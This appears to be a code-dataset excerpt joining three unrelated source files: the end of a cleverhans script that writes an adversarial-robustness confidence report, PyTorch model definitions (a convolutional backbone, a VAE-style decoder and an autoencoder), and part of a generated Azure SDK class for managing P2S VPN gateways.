instance of cleverhans.confidence_report.ConfidenceReport to
model_report.joblib.
The report can be later loaded by another script using cleverhans.serial.load.
This script puts the following entries in the report:
clean : Clean data
semantic : Semantic adversarial examples
mc: MaxConfidence adversarial examples
This script works by running a single MaxConfidence attack on each example.
( https://openreview.net/forum?id=H1g0piA9tQ )
This provides a reasonable estimate of the true failure rate quickly, so
long as the model does not suffer from gradient masking.
However, this estimate is mostly intended for development work and not
for publication. A more accurate estimate may be obtained by running
make_confidence_report_bundled.py instead.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import tensorflow as tf
from cleverhans.utils_tf import silence
silence()
# silence call must precede this imports. pylint doesn't like that
# pylint: disable=C0413
from cleverhans.compat import flags
from cleverhans.confidence_report import make_confidence_report
from cleverhans.confidence_report import BATCH_SIZE
from cleverhans.confidence_report import MC_BATCH_SIZE
from cleverhans.confidence_report import TRAIN_START
from cleverhans.confidence_report import TRAIN_END
from cleverhans.confidence_report import TEST_START
from cleverhans.confidence_report import TEST_END
from cleverhans.confidence_report import WHICH_SET
from cleverhans.confidence_report import NB_ITER
from cleverhans.confidence_report import BASE_EPS_ITER
from cleverhans.confidence_report import REPORT_PATH
from cleverhans.confidence_report import SAVE_ADVX
FLAGS = flags.FLAGS
def main(argv=None):
    """CLI entry point: build a confidence report for a serialized model.

    ``argv`` must be ``[script_name, model_filepath]``; any other length is
    rejected with a ValueError carrying the offending argv.
    """
    try:
        _script, filepath = argv
    except ValueError:
        raise ValueError(argv)
    # All remaining knobs come from the registered command-line flags.
    make_confidence_report(
        filepath=filepath,
        test_start=FLAGS.test_start,
        test_end=FLAGS.test_end,
        which_set=FLAGS.which_set,
        report_path=FLAGS.report_path,
        mc_batch_size=FLAGS.mc_batch_size,
        nb_iter=FLAGS.nb_iter,
        base_eps_iter=FLAGS.base_eps_iter,
        batch_size=FLAGS.batch_size,
        save_advx=FLAGS.save_advx,
    )
if __name__ == '__main__':
    # Flags must be registered before tf.app.run() parses sys.argv and
    # dispatches to main().  Defaults come from cleverhans.confidence_report.
    flags.DEFINE_integer('train_start', TRAIN_START, 'Starting point (inclusive)'
                         'of range of train examples to use')
    flags.DEFINE_integer('train_end', TRAIN_END, 'Ending point (non-inclusive) '
                         'of range of train examples to use')
    flags.DEFINE_integer('test_start', TEST_START, 'Starting point (inclusive) '
                         'of range of test examples to use')
    flags.DEFINE_integer('test_end', TEST_END, 'End point (non-inclusive) of '
                         'range of test examples to use')
    flags.DEFINE_integer('nb_iter', NB_ITER, 'Number of iterations of PGD')
    flags.DEFINE_string('which_set', WHICH_SET, '"train" or "test"')
    flags.DEFINE_string('report_path', REPORT_PATH, 'Path to save to')
    flags.DEFINE_integer('mc_batch_size', MC_BATCH_SIZE,
                         'Batch size for MaxConfidence')
    flags.DEFINE_integer('batch_size', BATCH_SIZE,
                         'Batch size for most jobs')
    flags.DEFINE_float('base_eps_iter', BASE_EPS_ITER,
                       'epsilon per iteration, if data were in [0, 1]')
    flags.DEFINE_integer('save_advx', SAVE_ADVX,
                         'If True, saves the adversarial examples to the '
                         'filesystem.')
    tf.app.run()
| 41.947917 | 79 | 0.732555 |
1893cc4397532c7c4826225e5c37feb6bd97a8ba | 4,102 | py | Python | conv64.py | DeuterCat/VAEAN | b369fc84a7ca2d062f60bb0d634e26be21c72fa2 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | conv64.py | DeuterCat/VAEAN | b369fc84a7ca2d062f60bb0d634e26be21c72fa2 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | conv64.py | DeuterCat/VAEAN | b369fc84a7ca2d062f60bb0d634e26be21c72fa2 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | import torch
from torch import nn
class Conv64F(nn.Module):
    """Four-layer 64-channel CNN backbone (Conv-BN-activation blocks).

    For an 84x84 input the output is 64 x 5 x 5 with default flags.

    Args:
        is_flatten: flatten the final feature map to a vector.
        is_feature: also return the intermediate maps of all four layers.
        leaky_relu: use LeakyReLU(negative_slope) instead of ReLU.
        negative_slope: slope for LeakyReLU when enabled.
        last_pool: apply max-pooling after layer 4.
        maxpool_last2: apply max-pooling after layer 3 (needed by some
            methods, e.g. relation networks).
    """

    def __init__(
        self,
        is_flatten=False,
        is_feature=False,
        leaky_relu=False,
        negative_slope=0.2,
        last_pool=True,
        maxpool_last2=True,
    ):
        super(Conv64F, self).__init__()
        self.is_flatten = is_flatten
        self.is_feature = is_feature
        self.last_pool = last_pool
        self.maxpool_last2 = maxpool_last2

        # A single activation module is shared by every block (it is stateless).
        if leaky_relu:
            act = nn.LeakyReLU(negative_slope=negative_slope, inplace=True)
        else:
            act = nn.ReLU(inplace=True)

        def conv_block(in_channels, pool):
            # Conv -> BN -> activation, with an optional trailing 2x2 max-pool.
            modules = [
                nn.Conv2d(in_channels, 64, kernel_size=3, stride=1, padding=1),
                nn.BatchNorm2d(64),
                act,
            ]
            if pool:
                modules.append(nn.MaxPool2d(kernel_size=2, stride=2))
            return nn.Sequential(*modules)

        # Attribute names are kept so state_dict keys match the original layout.
        self.layer1 = conv_block(3, pool=True)
        self.layer2 = conv_block(64, pool=True)
        self.layer3 = conv_block(64, pool=False)
        self.layer3_maxpool = nn.MaxPool2d(kernel_size=2, stride=2)
        self.layer4 = conv_block(64, pool=False)
        self.layer4_pool = nn.MaxPool2d(kernel_size=2, stride=2)

    def forward(self, x):
        feat1 = self.layer1(x)
        feat2 = self.layer2(feat1)
        feat3 = self.layer3(feat2)
        if self.maxpool_last2:
            # Some methods (relation net etc.) expect the pooled layer-3 map.
            feat3 = self.layer3_maxpool(feat3)
        feat4 = self.layer4(feat3)
        if self.last_pool:
            feat4 = self.layer4_pool(feat4)
        if self.is_flatten:
            feat4 = feat4.view(feat4.size(0), -1)
        if self.is_feature:
            return feat1, feat2, feat3, feat4
        return feat4
class SingleLinear(nn.Module):
    """Single affine projection from flattened 64x5x5 features to 64 dims."""

    def __init__(self):
        super(SingleLinear, self).__init__()
        # Wrapped in a Sequential so state_dict keys stay `stack.0.*`.
        self.stack = nn.Sequential(nn.Linear(64 * 5 * 5, 64))

    def forward(self, x):
        return self.stack(x)
class ReparaDecoder(nn.Module):
    """VAE-style head: maps 64x5x5 features to a 10-d latent with the
    reparameterization trick, then decodes the latent to a flattened
    84*84*3 output squashed into [-1, 1] by tanh.

    Returns (mu, log_var, reconstruction) from ``forward``.
    """

    def __init__(self):
        super(ReparaDecoder, self).__init__()
        # Mean and log-variance heads read the same input features.
        self.mu = nn.Sequential(
            nn.Linear(64 * 5 * 5, 10),
            nn.LeakyReLU(inplace=True),
        )
        self.log_var = nn.Sequential(
            nn.Linear(64 * 5 * 5, 10),
            nn.LeakyReLU(inplace=True),
        )
        # Decoder widens 10 -> 84*84*3 through geometric steps.
        self.stack = nn.Sequential(
            nn.Linear(10, 64),
            nn.LeakyReLU(inplace=True),
            nn.Linear(64, 256),
            nn.LeakyReLU(inplace=True),
            nn.Linear(256, 1024),
            nn.LeakyReLU(inplace=True),
            nn.Linear(1024, 4096),
            nn.LeakyReLU(inplace=True),
            nn.Linear(4096, 84 * 84 * 3),
            nn.Tanh(),
        )

    def forward(self, x):
        mean = self.mu(x)
        log_variance = self.log_var(x)
        # Reparameterization: z = mu + sigma * eps with eps ~ N(0, I), so the
        # sampling step stays differentiable w.r.t. mu and log_var.
        sigma = torch.exp(0.5 * log_variance)
        noise = torch.randn_like(sigma)
        latent = noise * sigma + mean
        return mean, log_variance, self.stack(latent)
class AutoEncoder(nn.Module):
    """Fully connected autoencoder over flattened 84x84 maps.

    Each entry along the leading dimension (batch item or image channel —
    the original comments call it ``nc``) is flattened to an 84*84 vector,
    compressed to 256 dims and reconstructed; tanh keeps the output in
    [-1, 1].  ``forward`` returns a tensor of shape (N, 84, 84).
    """

    def __init__(self):
        super(AutoEncoder, self).__init__()
        self.encoder = nn.Sequential(
            # input is (nc) x 84*84
            nn.Flatten(),
            nn.Linear(84**2, 1024),
            nn.LeakyReLU(inplace=True),
            nn.Linear(1024, 256),
            nn.LeakyReLU(inplace=True),
            # output is (nc) x 256
        )
        self.decoder = nn.Sequential(
            # input is (nc) x 256
            nn.Linear(256, 1024),
            nn.LeakyReLU(inplace=True),
            nn.Linear(1024, 84**2),
            nn.Tanh()
        )

    def forward(self, x):
        out = self.encoder(x)
        out = self.decoder(out)
        # Bug fix: the original `view(3, 84, 84)` hard-coded the leading
        # dimension, so any input with N != 3 crashed.  Inferring it with -1
        # is byte-identical for the N == 3 case and supports any batch size.
        out = out.view(-1, 84, 84)
        return out
| 27.530201 | 83 | 0.532667 |
5e1a120d90308fa97611261b3a007f1c096b0d7a | 46,859 | py | Python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_09_01/operations/_p2_svpn_gateways_operations.py | rsdoherty/azure-sdk-for-python | 6bba5326677468e6660845a703686327178bb7b1 | [
"MIT"
] | 3 | 2020-06-23T02:25:27.000Z | 2021-09-07T18:48:11.000Z | sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_09_01/operations/_p2_svpn_gateways_operations.py | rsdoherty/azure-sdk-for-python | 6bba5326677468e6660845a703686327178bb7b1 | [
"MIT"
] | 510 | 2019-07-17T16:11:19.000Z | 2021-08-02T08:38:32.000Z | sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_09_01/operations/_p2_svpn_gateways_operations.py | rsdoherty/azure-sdk-for-python | 6bba5326677468e6660845a703686327178bb7b1 | [
"MIT"
] | 5 | 2019-09-04T12:51:37.000Z | 2020-09-16T07:28:40.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class P2SVpnGatewaysOperations(object):
"""P2SVpnGatewaysOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_09_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
    # Thin wiring only: the pipeline client, configuration and
    # (de)serializers are injected by the generated service client.
    self._client = client
    self._serialize = serializer
    self._deserialize = deserializer
    self._config = config
def get(
    self,
    resource_group_name,  # type: str
    gateway_name,  # type: str
    **kwargs  # type: Any
):
    # type: (...) -> "_models.P2SVpnGateway"
    """Retrieves the details of a virtual wan p2s vpn gateway.

    :param resource_group_name: The resource group name of the P2SVpnGateway.
    :type resource_group_name: str
    :param gateway_name: The name of the gateway.
    :type gateway_name: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: P2SVpnGateway, or the result of cls(response)
    :rtype: ~azure.mgmt.network.v2019_09_01.models.P2SVpnGateway
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["_models.P2SVpnGateway"]
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    api_version = "2019-09-01"
    accept = "application/json"

    # Construct URL
    url = self.get.metadata['url']  # type: ignore
    path_format_arguments = {
        'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}  # type: Dict[str, Any]
    query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

    # Construct headers
    header_parameters = {}  # type: Dict[str, Any]
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    request = self._client.get(url, query_parameters, header_parameters)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    # 200 is the only success status for this GET; anything else is mapped
    # to a typed error or raised as a generic ARM HttpResponseError.
    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response, error_format=ARMErrorFormat)

    deserialized = self._deserialize('P2SVpnGateway', pipeline_response)

    if cls:
        return cls(pipeline_response, deserialized, {})

    return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/p2svpnGateways/{gatewayName}'}  # type: ignore
def _create_or_update_initial(
    self,
    resource_group_name,  # type: str
    gateway_name,  # type: str
    p2_s_vpn_gateway_parameters,  # type: "_models.P2SVpnGateway"
    **kwargs  # type: Any
):
    # type: (...) -> "_models.P2SVpnGateway"
    # Initial PUT of the create_or_update long-running operation; returns the
    # immediate 200/201 body.  Polling to completion is done by the public
    # begin_create_or_update wrapper.
    cls = kwargs.pop('cls', None)  # type: ClsType["_models.P2SVpnGateway"]
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    api_version = "2019-09-01"
    content_type = kwargs.pop("content_type", "application/json")
    accept = "application/json"

    # Construct URL
    url = self._create_or_update_initial.metadata['url']  # type: ignore
    path_format_arguments = {
        'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}  # type: Dict[str, Any]
    query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

    # Construct headers
    header_parameters = {}  # type: Dict[str, Any]
    header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    body_content_kwargs = {}  # type: Dict[str, Any]
    body_content = self._serialize.body(p2_s_vpn_gateway_parameters, 'P2SVpnGateway')
    body_content_kwargs['content'] = body_content
    request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    # 200 = updated existing gateway, 201 = created a new one.
    if response.status_code not in [200, 201]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response, error_format=ARMErrorFormat)

    if response.status_code == 200:
        deserialized = self._deserialize('P2SVpnGateway', pipeline_response)

    if response.status_code == 201:
        deserialized = self._deserialize('P2SVpnGateway', pipeline_response)

    if cls:
        return cls(pipeline_response, deserialized, {})

    return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/p2svpnGateways/{gatewayName}'}  # type: ignore
def begin_create_or_update(
    self,
    resource_group_name,  # type: str
    gateway_name,  # type: str
    p2_s_vpn_gateway_parameters,  # type: "_models.P2SVpnGateway"
    **kwargs  # type: Any
):
    # type: (...) -> LROPoller["_models.P2SVpnGateway"]
    """Creates a virtual wan p2s vpn gateway if it doesn't exist else updates the existing gateway.

    :param resource_group_name: The resource group name of the P2SVpnGateway.
    :type resource_group_name: str
    :param gateway_name: The name of the gateway.
    :type gateway_name: str
    :param p2_s_vpn_gateway_parameters: Parameters supplied to create or Update a virtual wan p2s
     vpn gateway.
    :type p2_s_vpn_gateway_parameters: ~azure.mgmt.network.v2019_09_01.models.P2SVpnGateway
    :keyword callable cls: A custom type or function that will be passed the direct response
    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: Pass in True if you'd like the ARMPolling polling method,
     False for no polling, or your own initialized polling object for a personal polling strategy.
    :paramtype polling: bool or ~azure.core.polling.PollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
    :return: An instance of LROPoller that returns either P2SVpnGateway or the result of cls(response)
    :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2019_09_01.models.P2SVpnGateway]
    :raises ~azure.core.exceptions.HttpResponseError:
    """
    polling = kwargs.pop('polling', True)  # type: Union[bool, PollingMethod]
    cls = kwargs.pop('cls', None)  # type: ClsType["_models.P2SVpnGateway"]
    lro_delay = kwargs.pop(
        'polling_interval',
        self._config.polling_interval
    )
    cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
    # Only issue the initial PUT when not resuming from a continuation token.
    if cont_token is None:
        raw_result = self._create_or_update_initial(
            resource_group_name=resource_group_name,
            gateway_name=gateway_name,
            p2_s_vpn_gateway_parameters=p2_s_vpn_gateway_parameters,
            cls=lambda x,y,z: x,
            **kwargs
        )

    kwargs.pop('error_map', None)
    kwargs.pop('content_type', None)

    def get_long_running_output(pipeline_response):
        deserialized = self._deserialize('P2SVpnGateway', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized

    path_format_arguments = {
        'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
    }

    # LRO completion is reported via the Azure-AsyncOperation header.
    if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
    elif polling is False: polling_method = NoPolling()
    else: polling_method = polling
    if cont_token:
        return LROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output
        )
    else:
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/p2svpnGateways/{gatewayName}'}  # type: ignore
def update_tags(
    self,
    resource_group_name,  # type: str
    gateway_name,  # type: str
    p2_s_vpn_gateway_parameters,  # type: "_models.TagsObject"
    **kwargs  # type: Any
):
    # type: (...) -> "_models.P2SVpnGateway"
    """Updates virtual wan p2s vpn gateway tags.

    :param resource_group_name: The resource group name of the P2SVpnGateway.
    :type resource_group_name: str
    :param gateway_name: The name of the gateway.
    :type gateway_name: str
    :param p2_s_vpn_gateway_parameters: Parameters supplied to update a virtual wan p2s vpn gateway
     tags.
    :type p2_s_vpn_gateway_parameters: ~azure.mgmt.network.v2019_09_01.models.TagsObject
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: P2SVpnGateway, or the result of cls(response)
    :rtype: ~azure.mgmt.network.v2019_09_01.models.P2SVpnGateway
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["_models.P2SVpnGateway"]
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    api_version = "2019-09-01"
    content_type = kwargs.pop("content_type", "application/json")
    accept = "application/json"

    # Construct URL
    url = self.update_tags.metadata['url']  # type: ignore
    path_format_arguments = {
        'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}  # type: Dict[str, Any]
    query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

    # Construct headers
    header_parameters = {}  # type: Dict[str, Any]
    header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    body_content_kwargs = {}  # type: Dict[str, Any]
    body_content = self._serialize.body(p2_s_vpn_gateway_parameters, 'TagsObject')
    body_content_kwargs['content'] = body_content
    # Tags-only updates are a synchronous PATCH, not an LRO.
    request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response, error_format=ARMErrorFormat)

    deserialized = self._deserialize('P2SVpnGateway', pipeline_response)

    if cls:
        return cls(pipeline_response, deserialized, {})

    return deserialized
update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/p2svpnGateways/{gatewayName}'}  # type: ignore
def _delete_initial(
    self,
    resource_group_name,  # type: str
    gateway_name,  # type: str
    **kwargs  # type: Any
):
    # type: (...) -> None
    # Initial DELETE of the delete long-running operation; returns nothing.
    # Polling to completion is done by the public begin_delete wrapper.
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    api_version = "2019-09-01"
    accept = "application/json"

    # Construct URL
    url = self._delete_initial.metadata['url']  # type: ignore
    path_format_arguments = {
        'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}  # type: Dict[str, Any]
    query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

    # Construct headers
    header_parameters = {}  # type: Dict[str, Any]
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    request = self._client.delete(url, query_parameters, header_parameters)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    # 200/202 = accepted for deletion, 204 = gateway already absent.
    if response.status_code not in [200, 202, 204]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response, error_format=ARMErrorFormat)

    if cls:
        return cls(pipeline_response, None, {})

_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/p2svpnGateways/{gatewayName}'}  # type: ignore
def begin_delete(
    self,
    resource_group_name,  # type: str
    gateway_name,  # type: str
    **kwargs  # type: Any
):
    # type: (...) -> LROPoller[None]
    """Deletes a virtual wan p2s vpn gateway.

    :param resource_group_name: The resource group name of the P2SVpnGateway.
    :type resource_group_name: str
    :param gateway_name: The name of the gateway.
    :type gateway_name: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: Pass in True if you'd like the ARMPolling polling method,
     False for no polling, or your own initialized polling object for a personal polling strategy.
    :paramtype polling: bool or ~azure.core.polling.PollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
    :return: An instance of LROPoller that returns either None or the result of cls(response)
    :rtype: ~azure.core.polling.LROPoller[None]
    :raises ~azure.core.exceptions.HttpResponseError:
    """
    polling = kwargs.pop('polling', True)  # type: Union[bool, PollingMethod]
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    lro_delay = kwargs.pop(
        'polling_interval',
        self._config.polling_interval
    )
    cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
    # Only issue the initial DELETE when not resuming from a continuation token.
    if cont_token is None:
        raw_result = self._delete_initial(
            resource_group_name=resource_group_name,
            gateway_name=gateway_name,
            cls=lambda x,y,z: x,
            **kwargs
        )

    kwargs.pop('error_map', None)
    kwargs.pop('content_type', None)

    def get_long_running_output(pipeline_response):
        if cls:
            return cls(pipeline_response, None, {})

    path_format_arguments = {
        'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
    }

    # Delete reports LRO completion via the Location header (unlike
    # create_or_update, which uses Azure-AsyncOperation).
    if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
    elif polling is False: polling_method = NoPolling()
    else: polling_method = polling
    if cont_token:
        return LROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output
        )
    else:
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/p2svpnGateways/{gatewayName}'}  # type: ignore
    def list_by_resource_group(
        self,
        resource_group_name,  # type: str
        **kwargs  # type: Any
    ):
        # type: (...) -> Iterable["_models.ListP2SVpnGatewaysResult"]
        """Lists all the P2SVpnGateways in a resource group.
        :param resource_group_name: The resource group name of the P2SVpnGateway.
        :type resource_group_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either ListP2SVpnGatewaysResult or the result of cls(response)
        :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_09_01.models.ListP2SVpnGatewaysResult]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.ListP2SVpnGatewaysResult"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2019-09-01"
        accept = "application/json"
        def prepare_request(next_link=None):
            # Build the GET request: the first page uses the templated operation
            # URL; subsequent pages use the service-provided ``next_link`` as-is.
            # Construct headers
            header_parameters = {}  # type: Dict[str, Any]
            header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
            if not next_link:
                # Construct URL
                url = self.list_by_resource_group.metadata['url']  # type: ignore
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
                }
                url = self._client.format_url(url, **path_format_arguments)
                # Construct parameters
                query_parameters = {}  # type: Dict[str, Any]
                query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
                request = self._client.get(url, query_parameters, header_parameters)
            else:
                # ``next_link`` already embeds its query string (incl. api-version).
                url = next_link
                query_parameters = {}  # type: Dict[str, Any]
                request = self._client.get(url, query_parameters, header_parameters)
            return request
        def extract_data(pipeline_response):
            # Deserialize one page -> (link to next page or None, item iterator).
            deserialized = self._deserialize('ListP2SVpnGatewaysResult', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, iter(list_of_elem)
        def get_next(next_link=None):
            # Fetch a single page; fail fast on any non-200 status.
            request = prepare_request(next_link)
            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)
            return pipeline_response
        return ItemPaged(
            get_next, extract_data
        )
    list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/p2svpnGateways'}  # type: ignore
    def list(
        self,
        **kwargs  # type: Any
    ):
        # type: (...) -> Iterable["_models.ListP2SVpnGatewaysResult"]
        """Lists all the P2SVpnGateways in a subscription.
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either ListP2SVpnGatewaysResult or the result of cls(response)
        :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_09_01.models.ListP2SVpnGatewaysResult]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.ListP2SVpnGatewaysResult"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2019-09-01"
        accept = "application/json"
        def prepare_request(next_link=None):
            # First page: templated operation URL; later pages: ``next_link`` as-is.
            # Construct headers
            header_parameters = {}  # type: Dict[str, Any]
            header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
            if not next_link:
                # Construct URL
                url = self.list.metadata['url']  # type: ignore
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
                }
                url = self._client.format_url(url, **path_format_arguments)
                # Construct parameters
                query_parameters = {}  # type: Dict[str, Any]
                query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
                request = self._client.get(url, query_parameters, header_parameters)
            else:
                # ``next_link`` already embeds its query string (incl. api-version).
                url = next_link
                query_parameters = {}  # type: Dict[str, Any]
                request = self._client.get(url, query_parameters, header_parameters)
            return request
        def extract_data(pipeline_response):
            # Deserialize one page -> (link to next page or None, item iterator).
            deserialized = self._deserialize('ListP2SVpnGatewaysResult', pipeline_response)
            list_of_elem = deserialized.value
